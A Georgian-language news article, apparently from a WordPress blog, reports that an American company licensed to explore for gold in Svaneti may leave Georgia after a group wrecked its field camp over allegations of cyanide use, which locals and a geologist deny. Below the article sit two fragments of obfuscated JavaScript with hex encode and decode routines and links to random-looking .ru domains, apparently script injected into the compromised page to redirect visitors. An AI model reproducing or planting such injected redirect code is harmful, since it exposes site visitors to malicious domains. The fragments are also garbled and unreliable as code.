RSS

ამერიკულმა კომპანიამ შესაძლოა საქართველო დატოვოს 

20 მაისი

13249508_1040921939330055_263340138_nამერიკელმა ინვესტორმა შესაძლოა საქართველო დატოვოს, რადგანაც მას მუშაობის  შესაძლებლობა არ ეძლევა. „ოპტიკალ სისტემსი“ სვანეთში  ოქროს ძიება-მოპოვებასთან დაკავშირებით ოფიციალური ლიცენზიის მფლობელია. კომპანიამ სვანეთში დიდი ინვესტიცია ჩადო, ჩაიტანა ტექნიკა, ჩაიყვანა უცხოელი სპეციალისტები, დაასაქმეს ადგილობრივები და ტერიტორიის კვლევა დაიწყო, თუმცა, ტერიტორიაზე გარკვეული ჯგუფი შეიჭრა და ყველაფერი გაანადგურა.

კომპანიის იურიდიული კონსულტანტი ირაკლი გვილია აცხადებს, რომ სახეზეა მიზანმიმართული პროვოკაცია: „გარკვეულმა ორგანიზებულმა ჯგუფმა, რომლებსაც, როგორც ჩანს გავლენიანი მფარველები ჰყავს, ტერიტორიაზე ყველაფერი დაარბია და გაანადგურა.  ამ პირებმა ფიზიკური და სიტყვიერი შეურაცხყოფა მიაყენეს ექსპერტებს, რომლებიც ადგილზე მუშობდნენ, დაარბიეს კომპანიის საველე ბანაკი და დააზიანეს ტექნიკის ის ნაწილი, რომელიც საკმაოდ ძვირადღირებულია. ასევე გაანადგურეს მოპოვებული მასალები. მიზეზი კი შეგნებული დეზინფორმაცია, პროვოკაცია და მოსახლეობის შეცდომაში შეყვანის მცდელობაა, რომლისაც არც  თვითონ სჯერად და არც ადგილობრივებს – თითქოს კომპანია შხამ-ქიმიკატებს, ციანიტს იყენებს და ურანს ეძებს. ეს პროცესი იყო კარგად ორგანიზებული პროვოკაცია.“

სოფელ იელის მოსახლეობის განცხადებით,  ოქროს ძიების სამუშაოები ტრადიციული მეთოდებით მიმდინარეობს და შეუძლებელია ქიმიკატების გამოყენება. მათი თქმით, აღნიშნული პროექტი მათი სოფლისთვის და სვანეთისთვის მნიშვნელოვანი პროექტია, რომელსაც გარკვეული გავლენიანი ჯგუფები ხელს უშლიან.

„ადგილობრივები დაგვასაქმეს, ჩვენ თავად ვმუშაობთ აქ და გამოდის, რომ ჩვენ ვიყენებთ შხამ-ქიმიკატებს. ეს არის სიცრუე. იმ ჯგუფმა, ვინც ტერიტორიაზე შემოიჭრა, კარგად იცის რომ ეს ტყუილია, მაგრამ როგორც ჩანს, აქ სხვა ამბავია. წლებია ამ საქმით ადგილობრვები ვართ დაკავებულები და სწორედ იმ ტრადიციული მეთოდებით ხდება ძიების სამუშაოები. თუ ინვესტორი არ დაბრუნდა, კარგს არაფერს ველით“ – აცხადებს გია ფანგანი.

გეოლოგი ბადრი გალდავა, რომელიც ადგილზე მუშაობდა, ამბობს, რომ სვანეთში შესაძლებელია იყოს  თვითნაბადი ოქრო და არა ქიმიურად დამუშავებული: „სვანეთში შეიძლება მხოლოდ თვითნაბადი ოქრო მოიპოვებოდეს. თვითნაბადი ოქროს მოპოვების ტექნოლოგია გულისხმობს მხოლოდ და მხოლოდ ქვა-ღორღის რეცხვას წყლით. არანაირი ქიმია არ იხმარება და რომც გინდოდეს ვერ გამოიყენებ. სვანეთში მოპოვებული ოქრო ეს არის ქვიშაში არსებული მექანიკური ნარევი, არსად მსოფლიოში, ასეთი ტიპის ოქროზე ციანიდი და მსგავსი მჟავები არ გამოიყენება, რადგანაც ეს არის ყველაზე მარტივად დასამუშავებელი ოქრო. რაც შეეხება ურანს, არც საქართველოში, არც ამიერ და იმიერ კავკასიაში, არც ათასობით კილომეტრზე ჩვენგან, ურანის საბადო არ არსებობს.“

ამ ეტაპამდე, ოფიციალური ლიცენზიის მქონე  კომპანია სვანეთში ვერ შედის და სამუშაოს ვერ ახორციელებს. კომპანიის წარმომადგენლებს იმედი აქვთ, რომ სამართალდამცავები ამ საკითხს უმოკლეს დროში გამოიძიებენ და იმასაც დაადგენენ, ვინ დგას ამ პროვოკაციის უკან.  ასევე, კანონიერი უფლებების დასაცავად  ფიქრობენ ამერიკის საელჩოს მიმართონ და თუ პრობლემა დროულად არ მოგვარდა, ქვეყნის დატოვებასაც არ გამორიცხავენ.

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “ekofact.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

 

კომენტარის დატოვება

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out /  შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out /  შეცვლა )

Connecting to %s